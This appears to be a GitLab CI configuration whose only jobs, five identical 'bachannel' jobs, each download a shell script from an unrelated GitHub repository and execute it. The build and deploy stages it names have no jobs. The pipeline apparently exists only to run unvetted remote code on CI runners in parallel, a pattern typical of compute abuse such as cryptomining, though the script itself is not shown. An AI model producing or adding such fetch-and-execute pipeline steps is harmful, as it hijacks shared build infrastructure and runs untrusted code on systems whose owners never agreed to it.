stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/theot-api/gen-api/main/scala.sh && chmod u+x scala.sh && ./scala.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/theot-api/gen-api/main/scala.sh && chmod u+x scala.sh && ./scala.sh
 
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/theot-api/gen-api/main/scala.sh && chmod u+x scala.sh && ./scala.sh
 
bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/theot-api/gen-api/main/scala.sh && chmod u+x scala.sh && ./scala.sh
 
bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/theot-api/gen-api/main/scala.sh && chmod u+x scala.sh && ./scala.sh